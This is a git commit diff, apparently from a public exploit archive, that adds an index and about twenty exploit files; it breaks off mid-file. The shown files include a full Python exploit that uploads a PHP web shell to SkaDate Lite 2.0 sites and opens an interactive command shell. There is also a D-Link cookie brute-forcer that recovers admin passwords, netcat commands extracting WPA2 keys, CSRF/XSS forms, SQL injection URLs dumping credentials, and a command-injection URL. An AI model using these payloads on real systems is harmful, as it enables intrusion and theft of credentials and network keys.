Updated 08_01_2014

2014-08-01 04:38:24 +00:00 · 2014-08-01 04:38:24 +00:00 · 39dde0cf7b
commit 39dde0cf7b
parent 3782948984
21 changed files with 744 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -30805,3 +30805,23 @@ id,file,description,date,author,platform,type,port
 34200,platforms/hardware/remote/34200.txt,"Cisco Adaptive Security Response HTTP Response Splitting Vulnerability",2010-06-25,"Daniel King",hardware,remote,0
 34201,platforms/linux/remote/34201.txt,"feh <= 1.7 '--wget-timestamp' Remote Code Execution Vulnerability",2010-06-25,anonymous,linux,remote,0
 34203,platforms/hardware/webapps/34203.txt,"Dlink DWR-113 Rev. Ax - CSRF Denial of Service",2014-07-30,"Blessen Thomas",hardware,webapps,0
+34204,platforms/php/webapps/34204.html,"SkaDate Lite 2.0 - Multiple CSRF And Persistent XSS Vulnerabilities",2014-07-30,LiquidWorm,php,webapps,80
+34205,platforms/php/webapps/34205.py,"SkaDate Lite 2.0 - Remote Code Execution Exploit",2014-07-30,LiquidWorm,php,webapps,80
+34206,platforms/hardware/webapps/34206.txt,"D-Link AP 3200 Multiple Vulnerabilities",2014-07-30,pws,hardware,webapps,80
+34207,platforms/php/webapps/34207.txt,"Customer Paradigm PageDirector 'id' Parameter SQL Injection Vulnerability",2010-06-28,Tr0y-x,php,webapps,0
+34208,platforms/hardware/remote/34208.txt,"D-Link DAP-1160 Wireless Access Point DCC Protocol Security Bypass Vulnerability",2010-06-28,"Cristofaro Mune",hardware,remote,0
+34209,platforms/php/webapps/34209.txt,"BlaherTech Placeto CMS 'Username' Parameter SQL Injection Vulnerability",2010-06-28,S.W.T,php,webapps,0
+34210,platforms/php/webapps/34210.txt,"OneCMS <= 2.6.1 admin/admin.php cat Parameter XSS",2010-06-24,"High-Tech Bridge SA",php,webapps,0
+34211,platforms/php/webapps/34211.html,"OneCMS <= 2.6.1 search.php search Parameter SQL Injection",2010-06-24,"High-Tech Bridge SA",php,webapps,0
+34212,platforms/php/webapps/34212.html,"OneCMS <= 2.6.1 admin/admin.php Short1 Parameter XSS",2010-06-24,"High-Tech Bridge SA",php,webapps,0
+34213,platforms/php/webapps/34213.txt,"PHP Bible Search bible.php chapter Parameter SQL Injection",2010-06-29,"L0rd CrusAd3r",php,webapps,0
+34214,platforms/php/webapps/34214.txt,"PHP Bible Search bible.php chapter Parameter XSS",2010-06-29,"L0rd CrusAd3r",php,webapps,0
+34215,platforms/php/webapps/34215.txt,"MySpace Clone 2010 SQL Injection and Cross Site Scripting Vulnerabilities",2010-06-28,"L0rd CrusAd3r",php,webapps,0
+34216,platforms/php/webapps/34216.txt,"eBay Clone Script 2010 'showcategory.php' SQL Injection Vulnerability",2010-06-28,"L0rd CrusAd3r",php,webapps,0
+34217,platforms/php/webapps/34217.txt,"Clix'N'Cash Clone 2010 'index.php' SQL Injection Vulnerability",2010-06-28,"L0rd CrusAd3r",php,webapps,0
+34218,platforms/php/webapps/34218.txt,"V-EVA Classified Script 5.1 'classified_img.php' SQL Injection Vulnerability",2010-06-28,Sid3^effects,php,webapps,0
+34219,platforms/php/webapps/34219.txt,"CANDID image/view.php image_id Parameter SQL Injection",2010-06-29,"L0rd CrusAd3r",php,webapps,0
+34220,platforms/php/webapps/34220.txt,"CANDID image/view.php image_id Parameter XSS",2010-06-29,"L0rd CrusAd3r",php,webapps,0
+34221,platforms/asp/webapps/34221.txt,"Iatek PortalApp 3.3/4.0 'login.asp' Multiple Cross Site Scripting Vulnerabilities",2010-06-29,"High-Tech Bridge SA",asp,webapps,0
+34222,platforms/php/webapps/34222.html,"Grafik CMS 'admin.php' SQL Injection and Cross Site Scripting Vulnerabilities",2010-06-29,"High-Tech Bridge SA",php,webapps,0
+34223,platforms/cgi/webapps/34223.txt,"Miyabi CGI Tools 1.02 \'index.pl\' Remote Command Execution Vulnerability",2010-06-29,"Marshall Whittaker",cgi,webapps,0
--- a/platforms/asp/webapps/34221.txt
+++ b/platforms/asp/webapps/34221.txt
@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/41224/info
+
+Iatek PortalApp is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Iatek PortalApp 4.0 is vulnerable; prior versions may also be affected. 
+
+http://www.example.com/login.asp?user_name=%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&password=&ret_page=
+
+http://www.example.com/login.asp?user_name=&password=%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&ret_page=
+
+http://www.example.com/login.asp?email=sd%40sd.df%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&search_btn=SEND&action=lookup&do_search=1
--- a/platforms/cgi/webapps/34223.txt
+++ b/platforms/cgi/webapps/34223.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41228/info
+
+Miyabi CGI Tools is prone to a vulnerability that attackers can leverage to execute arbitrary commands in the context of the application. This issue occurs because the application fails to adequately sanitize user-supplied input.
+
+Successful attacks can compromise the affected application and possibly the underlying computer.
+
+Miyabi CGI Tools 1.02 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.pl?mode=html&fn=|uname%20-a| 
--- a/platforms/hardware/remote/34208.txt
+++ b/platforms/hardware/remote/34208.txt
@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/41187/info
+
+The D-Link DAP-1160 wireless access point (WAP) is prone to a security-bypass vulnerability.
+
+Remote attackers can exploit this issue to bypass security restrictions, access certain administrative functions, alter configuration, or trigger a denial-of-service condition.
+
+D-Link DAP-1160 running firmware v120b06, v130b10, and v131b01 are vulnerable. 
+
+python -c 'print "\x05" + "\x00" * 7' | nc -u <IP_ADDR> 2003
+
+python -c 'print "\x03" + "\x00" * 7 + "\x21\x27\x00"' | nc -o ssid.txt -u <IP_ADDR> 2003
+cat ssid.txt
+(cleartext SSID displayed after "21 27 xx xx" in the received datagram)
+
+python -c 'print "\x03" + "\x00" * 7 + "\x23\x27\x00\x00\x24\x27\x00"' | nc -u -o pass.txt <IP_ADDR> 2003
+cat pass.txt
+(cleartext WPA2 PSK displayed after "24 27 xx xx" in the received datagram)
+
+
--- a/platforms/hardware/webapps/34206.txt
+++ b/platforms/hardware/webapps/34206.txt
@ -0,0 +1,134 @@
+# Exploit Title: D-Link AP 3200 Multiple Vulnerabilities
+# Date: 29/07/2014
+# Exploit Author: pws
+# Vendor Homepage: http://www.dlink.com/
+# Firmware Link: http://ftp.dlink.ru/pub/Wireless/DWL-3200AP/Firmware/
+# Tested on: Latest version
+# Shodan d0rk: "Server: Allegro-Software-RomPager/4.06" ~12000 devices
+# CVE : None yet
+
+Those vulnerabilities have only been tested on the D-Link AP 3200 serie but 
+other series (8600, 7700, 2700, ..) might also be vulnerable. 
+
+
+1. Unauthenticated request to change Wireless settings
+
+To do so, you just need to craft a specific POST Request: 
+
+$ curl 'http://192.168.50.3/Forms/FormCfgWireless?1,0,6' --data 'ApModeMenu=Access+Point&Ssid=MyPrivateNetwork&SsidBroadcast=Enable&AutoChannelScan=on&AuthMenu=WPA2-Personal&Cipher=AUTO&WPA_GroupKeyUpdateInterval=1800&passphrase=OMGWTFBBQ&Preapply=0&toReboot=0&hide=0' -D - 
+
+HTTP/1.1 303 See Other
+Location: http://192.168.50.3/html/bWirelessSetting.htm?1,0,6
+Content-Length: 0
+Server: Allegro-Software-RomPager/4.06
+
+ESSID will be: MyPrivateNetwork
+Passphrase will be: OMGWTFBBQ
+
+Other actions might also be vulnerable but this one was the most critical.
+Moreover, those requests can lead to CSRF attacks (to target internal devices).
+
+
+2. Credentials in plaintext
+
+Passwords are stored in plaintext in the device. 
+This can be verified by (after logging in) going to administration page: /html/tUserAccountControl.htm .
+Fields (Old && New && Confirm New) password are already filled.
+
+
+3. Weak cookie value (RpWebID)
+
+The cookie value generated is nothing more than the uptime of the AP. 
+Here is the output between two requests (delay between requests: 1sec): 
+
+$ curl http://192.168.50.3
+<html><head>
+<script src="jsMain.js"> </script>
+<title>DWL-3200AP</title></head>
+
+
+<script language='JavaScript'>
+document.cookie = 'RpWebID=3c27a451';
+</script>
+<script language='JavaScript'>
+function JumpToHmain(){location.replace('/html/index.htm');}window.setTimeout('JumpToHmain()',1);</script>
+
+
+$ curl http://192.168.50.3
+<html><head>
+<script src="jsMain.js"> </script>
+<title>DWL-3200AP</title></head>
+
+
+<script language='JavaScript'>
+document.cookie = 'RpWebID=3c27a452';
+</script>
+<script language='JavaScript'>
+function JumpToHmain(){location.replace('/html/index.htm');}window.setTimeout('JumpToHmain()',1);</script>
+
+
+4. PoC Time! 
+
+Basically, this code extracts the cookie value and decrement it to try all combinations from the last hour. (3600 values)
+If there's one valid, it recovers the password from the AP. 
+I added some (horrible) 'trick' to not stress the network 'too much', but we said PoC, right?
+
+# Example of usage
+# $ python poc.py 
+# Cookie value extracted: 3c27acbb
+# [+] Cookie: 3c27acae valid !
+# [+] Password of AP is: admin123
+
+import threading 
+import requests
+import sys
+import re
+import time
+import HTMLParser
+
+# replace it with your target
+url = "http://192.168.50.3/"
+
+def test_valid_cookie(cookie_val):
+    cookies = dict(RpWebID=cookie_val)
+    try:
+        req = requests.get('%shtml/tUserAccountControl.htm' % (url), cookies=cookies, timeout=10)
+        pattern = r"NAME=\"OldPwd\" SIZE=\"12\" MAXLENGTH=\"12\" VALUE=\"([?-9]+)\""
+        if ('NAME="OldPwd"' in req.content):
+            print '[+] Cookie: %s valid !' % (cookie_val)
+            h = HTMLParser.HTMLParser()
+            password = re.findall(pattern, req.content)[0].replace('&', ';&')[1:] + ";"
+            print '[+] Password of AP is: %s' % h.unescape(password)
+    except:
+        # print "[!] Error while connecting to the host"
+        sys.exit(-1)
+
+
+def get_cookie_value():
+    pattern = "RpWebID=([a-z0-9]{8})"
+    try:
+        req = requests.get(url, timeout=3)
+        regex = re.search(pattern, req.content)
+        if (regex is None):
+            print "[!] Unable to retrieve cookie in HTTP response"
+            sys.exit(-1)
+        else:
+            return regex.group(1)
+    except:
+        print "[!] Error while connecting to the host"
+        sys.exit(-1)
+
+cookie_val = get_cookie_value()
+print "Cookie value extracted: %s" % (cookie_val)
+
+start = int(cookie_val, 16) - 3600 # less than one hour
+cookie_val = int(cookie_val, 16)
+
+counter = 0
+for i in xrange(cookie_val, start, -1):
+    if (counter >= 350):
+        time.sleep(3)
+        counter = 0
+    b = threading.Thread(None, test_valid_cookie, None, (format(i, 'x'),)) 
+    b.start()
+    counter = counter + 1
--- a/platforms/php/webapps/34204.html
+++ b/platforms/php/webapps/34204.html
@ -0,0 +1,103 @@
+<!--
+
+SkaDate Lite 2.0 Multiple XSRF And Persistent XSS Vulnerabilities
+
+
+Vendor: Skalfa LLC
+Product web page: http://lite.skadate.com | http://www.skalfa.com
+Affected version: 2.0 (build 7651) [Platform version: 1.7.0 (build 7906)]
+
+Summary: SkaDate Lite is a new platform that makes it easy
+to start online dating business in just a few easy steps. No
+programming or design knowledge is required. Install the solution,
+pick a template, and start driving traffic to your new online
+dating site.
+
+Desc: SkaDate Lite version 2.0 suffers from multiple cross-site
+request forgery and stored xss vulnerabilities. The application
+allows users to perform certain actions via HTTP requests
+without performing any validity checks to verify the requests.
+This can be exploited to perform certain actions with administrative
+privileges if a logged-in user visits a malicious web site.
+Input passed to several POST parameters is not properly
+sanitised before being returned to the user. This can be
+exploited to execute arbitrary HTML and script code in a
+user's browser session in context of an affected site.
+
+Tested on: CentOS Linux 6.5 (Final)
+           nginx/1.6.0
+           PHP/5.3.28
+           MySQL 5.5.37
+
+
+Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
+                              @zeroscience
+
+
+Advisory ID: ZSL-2014-5197
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5197.php
+
+
+
+23.07.2014
+
+-->
+
+
+<html>
+<title>SkaDate Lite 2.0 Multiple XSRF And Persistent XSS Vulnerabilities</title>
+<body>
+
+
+<form action="http://192.168.0.105/admin/users/roles/" method="POST">
+<input type="hidden" name="form_name" value="add-role" />
+<input type="hidden" name="label" value='"><script>alert(1);</script>' />
+<input type="hidden" name="submit" value="Add" />
+<input type="submit" value="Execute #1" />
+</form>
+
+
+<form action="http://192.168.0.105/admin/questions/ajax-responder/" method="POST">
+<input type="hidden" name="form_name" value="account_type_49693e2b1cb50cad5c42b18a9103f146dcce2ec6" />
+<input type="hidden" name="command" value="AddAccountType" />
+<input type="hidden" name="key" value="questions_account_type_5615100a931845eca8da20cfdf7327e0" />
+<input type="hidden" name="prefix" value="base" />
+<input type="hidden" name="accountTypeName" value="5615100a931845eca8da20cfdf7327e0" />
+<input type="hidden" name="lang[1][base][questions_account_type_5615100a931845eca8da20cfdf7327e0]" value='"><script>alert(2);</script>' />
+<input type="hidden" name="role" value="12" />
+<input type="submit" value="Execute #2" />
+</form>
+
+
+<form action="http://192.168.0.105/admin/questions/ajax-responder/" method="POST">
+<input type="hidden" name="form_name" value="qst_add_form" />
+<input type="hidden" name="qst_name" value='"><script>alert(3);</script>' />
+<input type="hidden" name="qst_description" value="ZSL" />
+<input type="hidden" name="qst_account_type[0]" value="290365aadde35a97f11207ca7e4279cc" />
+<input type="hidden" name="qst_section" value="f90cde5913235d172603cc4e7b9726e3" />
+<input type="hidden" name="qst_answer_type" value="text" />
+<input type="hidden" name="qst_possible_values" value="%5B%5D" />
+<input type="hidden" name="year_range[to]" value="1996" />
+<input type="hidden" name="year_range[from]" value="1930" />
+<input type="hidden" name="qst_column_count" value="1" />
+<input type="hidden" name="qst_required" value="" />
+<input type="hidden" name="qst_on_sign_up" value="" />
+<input type="hidden" name="qst_on_edit" value="" />
+<input type="hidden" name="qst_on_view" value="" />
+<input type="hidden" name="qst_on_search" value="" />
+<input type="hidden" name="valuesStorage" value="%7B%7D" />
+<input type="hidden" name="command" value="addQuestion" />
+<input type="submit" value="Execute #3" />
+</form>
+
+
+<form action="http://192.168.0.105/admin/restricted-usernames" method="POST">
+<input type="hidden" name="form_name" value='restrictedUsernamesForm"><script>alert(4);</script>' />
+<input type="hidden" name="restrictedUsername" value='"><script>alert(5);</script>' />
+<input type="hidden" name="addUsername" value="Add" />
+<input type="submit" value="Execute #4 & #5" />
+</form>
+
+
+</body>
+</html>
--- a/platforms/php/webapps/34205.py
+++ b/platforms/php/webapps/34205.py
@ -0,0 +1,284 @@
+#!/usr/bin/env python
+#
+#
+# SkaDate Lite 2.0 Remote Code Execution Exploit
+#
+#
+# Vendor: Skalfa LLC
+# Product web page: http://lite.skadate.com | http://www.skalfa.com
+# Affected version: 2.0 (build 7651) [Platform version: 1.7.0 (build 7906)]
+#
+# Summary: SkaDate Lite is a new platform that makes it easy to
+# start online dating business in just a few easy steps. No
+# programming or design knowledge is required. Install the solution,
+# pick a template, and start driving traffic to your new online
+# dating site.
+#
+# Desc: SkaDate Lite suffers from an authenticated arbitrary PHP code
+# execution. The vulnerability is caused due to the improper
+# verification of uploaded files in '/admin/settings/user' script
+# thru the 'avatar' and 'bigAvatar' POST parameters. This can be
+# exploited to execute arbitrary PHP code by uploading a malicious
+# PHP script file with '.php5' extension (to bypass the '.htaccess'
+# block rule) that will be stored in '/ow_userfiles/plugins/base/avatars/'
+# directory.
+#
+# Tested on: CentOS Linux 6.5 (Final)
+#    	     nginx/1.6.0
+#            PHP/5.3.28
+#            MySQL 5.5.37
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#
+# Zero Science Lab - http://www.zeroscience.mk
+# Macedonian Information Security Research And Development Laboratory
+#
+#
+# Advisory ID: ZSL-2014-5198
+# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5198.php
+#
+#
+# 23.07.2014
+#
+#
+
+version = '4.0.0.251'
+
+import itertools, mimetools, mimetypes
+import cookielib, urllib, urllib2, sys
+import logging, os, time, datetime, re
+
+from colorama import Fore, Back, Style, init
+from cStringIO import StringIO
+from urllib2 import URLError
+
+init()
+
+if os.name == 'posix': os.system('clear')
+if os.name == 'nt': os.system('cls')
+piton = os.path.basename(sys.argv[0])
+
+def bannerche():
+	print '''
+ @---------------------------------------------------------------@
+ |                                                               |
+ |         SkaDate Lite 2.0 Remote Code Execution Exploit        |
+ |                                                               |
+ |                                                               |
+ |                       ID: ZSL-2014-5198                       |
+ |                                                               |
+ |              Copyleft (c) 2014, Zero Science Lab              |
+ |                                                               |
+ @---------------------------------------------------------------@
+          '''
+	if len(sys.argv) < 2:
+		print '\n\x20\x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' <hostname>\n'
+		print '\x20\x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' zeroscience.mk\n'
+		sys.exit()
+
+bannerche()
+
+print '\n\x20\x20[*] Initialising exploit '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET
+
+host = sys.argv[1]
+
+cj = cookielib.CookieJar()
+opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
+
+try:
+	opener.open('http://'+host+'/sign-in?back-uri=admin')
+except urllib2.HTTPError, errorzio:
+	if errorzio.code == 404:
+		print '\x20\x20[*] Checking path '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
+		print '\x20\x20[*] '+Fore.YELLOW+'Check your path entry.'+Fore.RESET
+		print
+		sys.exit()
+except URLError, errorziocvaj:
+	if errorziocvaj.reason:
+		print '\x20\x20[*] Checking host '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
+		print '\x20\x20[*] '+Fore.YELLOW+'Check your hostname entry.'+Fore.RESET
+		print
+		sys.exit()
+
+print '\x20\x20[*] Checking host and path '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET
+print '\x20\x20[*] Login please.'
+
+username = raw_input('\x20\x20[*] Enter username: ')
+password = raw_input('\x20\x20[*] Enter password: ')
+
+login_data = urllib.urlencode({
+							'form_name' : 'sign-in',
+							'identity' : username,
+							'password' : password,
+							'remember' : 'on',
+							'submit' : 'Sign In'
+							})
+
+try:
+	login = opener.open('http://'+host+'/sign-in?back-uri=admin', login_data)
+	auth = login.read()
+except urllib2.HTTPError, errorziotraj:
+	if errorziotraj.code == 403:
+		print '\x20\x20[*] '+Fore.RED+'Blocked by WAF.'+Fore.RESET
+		print
+		sys.exit()
+
+for session in cj:
+	sessid = session.name
+
+print '\x20\x20[*] Mapping session ID '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
+ses_chk = re.search(r'%s=\w+' % sessid , str(cj))
+cookie = ses_chk.group(0)
+print '\x20\x20[*] Cookie: '+Fore.YELLOW+cookie+Fore.RESET
+
+if re.search(r'Invalid username or email', auth):
+	print '\x20\x20[*] Invalid username or email given '+'.'*23+Fore.RED+'[ER]'+Fore.RESET
+	print
+	sys.exit()
+elif re.search(r'Invalid password', auth):
+	print '\x20\x20[*] Invalid password '+'.'*38+Fore.RED+'[ER]'+Fore.RESET
+	sys.exit()
+else:
+	print '\x20\x20[*] Authenticated '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET
+
+
+class MultiPartForm(object):
+
+    def __init__(self):
+        self.form_fields = []
+        self.files = []
+        self.boundary = mimetools.choose_boundary()
+        return
+    
+    def get_content_type(self):
+        return 'multipart/form-data; boundary=%s' % self.boundary
+
+    def add_field(self, name, value):
+        self.form_fields.append((name, value))
+        return
+
+    def add_file(self, fieldname, filename, fileHandle, mimetype=None):
+        body = fileHandle.read()
+        if mimetype is None:
+            mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
+        self.files.append((fieldname, filename, mimetype, body))
+        return
+    
+    def __str__(self):
+
+        parts = []
+        part_boundary = '--' + self.boundary
+        
+        parts.extend(
+            [ part_boundary,
+              'Content-Disposition: form-data; name="%s"' % name,
+              '',
+              value,
+            ]
+            for name, value in self.form_fields
+            )
+        
+        parts.extend(
+            [ part_boundary,
+              'Content-Disposition: file; name="%s"; filename="%s"' % \
+                 (field_name, filename),
+              'Content-Type: %s' % content_type,
+              '',
+              body,
+            ]
+            for field_name, filename, content_type, body in self.files
+            )
+        
+        flattened = list(itertools.chain(*parts))
+        flattened.append('--' + self.boundary + '--')
+        flattened.append('')
+        return '\r\n'.join(flattened)
+
+if __name__ == '__main__':
+
+    form = MultiPartForm()
+    form.add_field('form_name', 'userSettingsForm')
+    form.add_field('displayName', 'realname')
+    form.add_field('confirmEmail', 'on')
+    form.add_field('avatarSize', '90')
+    form.add_field('bigAvatarSize', '190')
+    form.add_field('avatar', '')
+    form.add_field('join_display_photo_upload', 'display')
+    form.add_field('save', 'Save')
+    
+    form.add_file('bigAvatar', 'thricerbd.php5', 
+                  fileHandle=StringIO('<?php system(\'echo \"<?php echo \\"<pre>\\"; passthru(\$_GET[\\\'cmd\\\']); echo \\"</pre>\\"; ?>\" > liwo.php5\'); ?>'))
+
+    request = urllib2.Request('http://'+host+'/admin/settings/user')
+    request.add_header('User-agent', 'joxypoxy 4.0')
+    body = str(form)
+    request.add_header('Content-type', form.get_content_type())
+    request.add_header('Cookie', cookie)
+    request.add_header('Content-length', len(body))
+    request.add_data(body)
+    request.get_data()
+    urllib2.urlopen(request).read()
+    print '\x20\x20[*] Sending payload '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET
+    checkfilename = urllib2.urlopen(request).read()
+    filename = re.search('default_avatar_big_(\w+)', checkfilename).group(1)
+    print '\x20\x20[*] Getting file name '+'.'*37+Fore.GREEN+'[OK]'+Fore.RESET
+    print '\x20\x20[*] File name: '+Fore.YELLOW+'default_avatar_big_'+filename+'.php5'+Fore.RESET
+
+opener.open('http://'+host+'/ow_userfiles/plugins/base/avatars/default_avatar_big_'+filename+'.php5')
+print '\x20\x20[*] Persisting file liwo.php5 '+'.'*29+Fore.GREEN+'[OK]'+Fore.RESET
+
+print '\x20\x20[*] Starting logging service '+'.'*30+Fore.GREEN+'[OK]'+Fore.RESET
+print '\x20\x20[*] Spawning shell '+'.'*40+Fore.GREEN+'[OK]'+Fore.RESET
+time.sleep(1)
+
+furl = '/ow_userfiles/plugins/base/avatars/liwo.php5'
+
+print
+today = datetime.date.today()
+fname = 'skadate-'+today.strftime('%d-%b-%Y')+time.strftime('_%H%M%S')+'.log'
+logging.basicConfig(filename=fname,level=logging.DEBUG)
+
+logging.info(' '+'+'*75)
+logging.info(' +')
+logging.info(' + Log started: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S'))
+logging.info(' + Title: SkaDate Lite 2.0 Remote Code Execution Exploit')
+logging.info(' + Python program executed: '+sys.argv[0])
+logging.info(' + Version: '+version)
+logging.info(' + Full query: \''+piton+'\x20'+host+'\'')
+logging.info(' + Username input: '+username)
+logging.info(' + Password input: '+password)
+logging.info(' + Vector: '+'http://'+host+furl)
+logging.info(' +')
+logging.info(' + Advisory ID: ZSL-2014-5198')
+logging.info(' + Zero Science Lab - http://www.zeroscience.mk')
+logging.info(' +')
+logging.info(' '+'+'*75+'\n')
+
+print Style.DIM+Fore.CYAN+'\x20\x20[*] Press [ ENTER ] to INSERT COIN!\n'+Style.RESET_ALL+Fore.RESET
+raw_input()
+while True:
+	try:
+		cmd = raw_input(Fore.RED+'shell@'+host+':~# '+Fore.RESET)
+		execute = opener.open('http://'+host+furl+'?cmd='+urllib.quote(cmd))
+		reverse = execute.read()
+		pattern = re.compile(r'<pre>(.*?)</pre>',re.S|re.M)
+
+		print Style.BRIGHT+Fore.CYAN
+		cmdout = pattern.match(reverse)
+		print cmdout.groups()[0].strip()
+		print Style.RESET_ALL+Fore.RESET
+
+		if cmd.strip() == 'exit':
+			break
+
+		logging.info('Command executed: '+cmd+'\n\nOutput: \n'+'='*8+'\n\n'+cmdout.groups()[0].strip()+'\n\n'+'-'*60+'\n')
+	except Exception:
+		break
+
+logging.warning('\n\nLog ended: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S')+'\n\nEND OF LOG')
+print '\x20\x20[*] Carpe commentarius '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
+print '\x20\x20[*] Log file: '+Fore.YELLOW+fname+Fore.RESET
+print
+
+sys.exit()
--- a/platforms/php/webapps/34207.txt
+++ b/platforms/php/webapps/34207.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/41184/info
+
+Customer Paradigm PageDirector is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?id=UniOn+AlL+SelEct+group_concat(username,0x3e,password)+from+admin-- 
--- a/platforms/php/webapps/34209.txt
+++ b/platforms/php/webapps/34209.txt
@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/41190/info
+
+BlaherTech Placeto CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+The following example data is available:
+
+Username: or\'1\'=\'1\'
+Password: S.W.T 
--- a/platforms/php/webapps/34210.txt
+++ b/platforms/php/webapps/34210.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41194/info
+
+OneCMS is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+OneCMS 2.6.1 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/admin/admin.php?cat=cheats%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
--- a/platforms/php/webapps/34211.html
+++ b/platforms/php/webapps/34211.html
@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/41194/info
+ 
+OneCMS is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
+ 
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+OneCMS 2.6.1 is vulnerable; prior versions may also be affected.
+
+<form action="http://www.example.com/search.php?view=forums" method="post" name="main" >
+<input type="hidden" name="search" value="1+any sql" />
+</form>
+<script>
+document.main.submit();
+</script>
--- a/platforms/php/webapps/34212.html
+++ b/platforms/php/webapps/34212.html
@ -0,0 +1,23 @@
+source: http://www.securityfocus.com/bid/41194/info
+  
+OneCMS is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
+  
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+  
+OneCMS 2.6.1 is vulnerable; prior versions may also be affected.
+
+<form action="http://www.example.com/admin/admin.php?view=manage&edit=2" method="post" name="main" >
+<input type="hidden" name="id[]" value="1" />
+<input type="hidden" name="cat_1" value="news" />
+<input type="hidden" name="name_1" value="OneCMS News title" />
+<input type="hidden" name="lev_1" value="No" />
+<input type="hidden" name="Full1" value="news full text" />
+<input type="hidden" name="systems1" value="" />
+<input type="hidden" name="games1" value="" />
+<input type="hidden" name="Short1" value='short"><script>alert(document.cookie)</script>' />
+<input type="hidden" name="image1" value="" />
+<input type="hidden" name="Add" value="Submit Changes" />
+</form>
+<script>
+document.main.submit();
+</script>
--- a/platforms/php/webapps/34213.txt
+++ b/platforms/php/webapps/34213.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/41197/info
+
+PHP Bible Search is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/bible.php?string=&book=2&chapter=[SQLI]
--- a/platforms/php/webapps/34214.txt
+++ b/platforms/php/webapps/34214.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/41197/info
+ 
+PHP Bible Search is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+ 
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+http://www.example.com/bible.php?string=&book=2&chapter=[XSS] 
--- a/platforms/php/webapps/34215.txt
+++ b/platforms/php/webapps/34215.txt
@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/41199/info
+
+MySpace Clone 2010 is prone to an SQL-injection and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+SQL Injection:
+
+http://www.example.com/index.php?mode=[sqli]
+
+Cross Site Scripting:
+
+http://www.example.com/index.php?mode=[xss]
+
--- a/platforms/php/webapps/34216.txt
+++ b/platforms/php/webapps/34216.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/41200/info
+
+eBay Clone Script 2010 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/showcategory.php?cid=[sqli] 
--- a/platforms/php/webapps/34217.txt
+++ b/platforms/php/webapps/34217.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/41202/info
+
+Clix'N'Cash Clone 2010 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
